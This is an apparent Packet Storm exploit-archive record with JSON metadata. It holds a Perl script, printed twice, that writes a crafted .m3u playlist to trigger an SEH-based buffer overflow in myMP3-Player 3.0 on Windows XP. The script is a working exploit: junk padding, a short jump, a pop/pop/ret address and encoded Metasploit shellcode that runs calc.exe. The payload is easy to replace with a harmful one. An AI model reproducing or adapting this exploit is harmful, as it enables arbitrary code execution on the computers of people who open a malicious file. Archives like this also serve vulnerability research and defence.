ID PACKETSTORM:87439
Type packetstorm
Reporter n3w7u
Modified 2010-03-19T00:00:00
Description
`#!/usr/bin/perl
# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 19.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 and the other version can't be download from serious Page, and don't be free.
# Tested on: Windows XP SP3 (ger)
#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]
my $file= "evil.m3u";
my $junk ="\x41" x 1040; # for myMp3 Player 5/cracked junk =1056
my $jmp="\xEB\x08\x90\x90"; # jmp short
my $seh="\x25\x12\xC8\x72"; #72 C8 12 25 msacm32.drv
my $nop ="\x90" x 20;
my $nops ="\x90" x 10;
# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" .
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" .
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" .
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" .
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" .
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" .
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" .
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" .
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" .
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" .
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" .
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" .
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" .
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" .
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce";
open($File,">$file");
print $File $junk.$jmp.$seh.$nop.$buf.$nops;
close($File);
`
{"hash": "edab6cad19b8f47f9e69123b3251a5fcbbc3145ff50955e524c61424cb7c5eec", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 0, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/87439/myMP3-Player-3.0-Local-Buffer-Overflow.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "4467e9e427b7c11ef66b1b8dbd99a34f"}, {"key": "modified", "hash": "9c4d2b3aca4826f6e7d0dd8fa322b9cc"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9c4d2b3aca4826f6e7d0dd8fa322b9cc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "13c4c466774992a641dd4fa535ab10a1"}, {"key": "sourceData", "hash": "7beccca6efbaa73bfa15d232e771fcd0"}, {"key": "sourceHref", "hash": "28cc62ed0a2a0ac0ad701f52443c04e7"}, {"key": "title", "hash": "1498d72147f5ce8df4005509a665bc1d"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2010-03-19T00:00:00", "modified": "2010-03-19T00:00:00", "title": "myMP3-Player 3.0 Local Buffer Overflow", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/87439/mymp3player-overflow.txt", "history": [], "reporter": "n3w7u", "lastseen": "2016-11-03T10:26:57", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:57"}, "vulnersScore": 7.2}, "sourceData": "`#!/usr/bin/perl \n \n# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH) \n# Date: 19.03.2010 \n# Author: n3w7u \n# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html \n# Version: 3.0 and the other version can't be download from serious Page, and don't be free. \n# Tested on: Windows XP SP3 (ger) \n \n \n#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ] \n \nmy $file= \"evil.m3u\"; \nmy $junk =\"\\x41\" x 1040; # for myMp3 Player 5/cracked junk =1056 \nmy $jmp=\"\\xEB\\x08\\x90\\x90\"; # jmp short \nmy $seh=\"\\x25\\x12\\xC8\\x72\"; #72 C8 12 25 msacm32.drv \nmy $nop =\"\\x90\" x 20; \nmy $nops =\"\\x90\" x 10; \n \n# windows/exec - 224 bytes \n# http://www.metasploit.com \n# Encoder: x86/call4_dword_xor \n# EXITFUNC=process, CMD=calc.exe \nmy $buf = \n\"\\x2b\\xc9\\x83\\xe9\\xce\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\" . \n\"\\x0e\\xa8\\x6e\\x77\\xce\\x83\\xee\\xfc\\xe2\\xf4\\x54\\x86\\xfe\\xce\" . \n\"\\xa8\\x6e\\x17\\x47\\x4d\\x5f\\xa5\\xaa\\x23\\x3c\\x47\\x45\\xfa\\x62\" . \n\"\\xfc\\x9c\\xbc\\xe5\\x05\\xe6\\xa7\\xd9\\x3d\\xe8\\x99\\x91\\x46\\x0e\" . \n\"\\x04\\x52\\x16\\xb2\\xaa\\x42\\x57\\x0f\\x67\\x63\\x76\\x09\\x4a\\x9e\" . \n\"\\x25\\x99\\x23\\x3c\\x67\\x45\\xea\\x52\\x76\\x1e\\x23\\x2e\\x0f\\x4b\" . \n\"\\x68\\x1a\\x3d\\xcf\\x78\\x3e\\xfc\\x86\\xb0\\xe5\\x2f\\xee\\xa9\\xbd\" . \n\"\\x94\\xf2\\xe1\\xe5\\x43\\x45\\xa9\\xb8\\x46\\x31\\x99\\xae\\xdb\\x0f\" . \n\"\\x67\\x63\\x76\\x09\\x90\\x8e\\x02\\x3a\\xab\\x13\\x8f\\xf5\\xd5\\x4a\" . \n\"\\x02\\x2c\\xf0\\xe5\\x2f\\xea\\xa9\\xbd\\x11\\x45\\xa4\\x25\\xfc\\x96\" . \n\"\\xb4\\x6f\\xa4\\x45\\xac\\xe5\\x76\\x1e\\x21\\x2a\\x53\\xea\\xf3\\x35\" . \n\"\\x16\\x97\\xf2\\x3f\\x88\\x2e\\xf0\\x31\\x2d\\x45\\xba\\x85\\xf1\\x93\" . \n\"\\xc2\\x6f\\xfa\\x4b\\x11\\x6e\\x77\\xce\\xf8\\x06\\x46\\x45\\xc7\\xe9\" . \n\"\\x88\\x1b\\x13\\x9e\\xc2\\x6c\\xfe\\x06\\xd1\\x5b\\x15\\xf3\\x88\\x1b\" . \n\"\\x94\\x68\\x0b\\xc4\\x28\\x95\\x97\\xbb\\xad\\xd5\\x30\\xdd\\xda\\x01\" . \n\"\\x1d\\xce\\xfb\\x91\\xa2\\xad\\xc9\\x02\\x14\\xe0\\xcd\\x16\\x12\\xce\"; \n \nopen($File,\">$file\"); \nprint $File $junk.$jmp.$seh.$nop.$buf.$nops; \nclose($File); \n \n`\n", "id": "PACKETSTORM:87439"}
{}
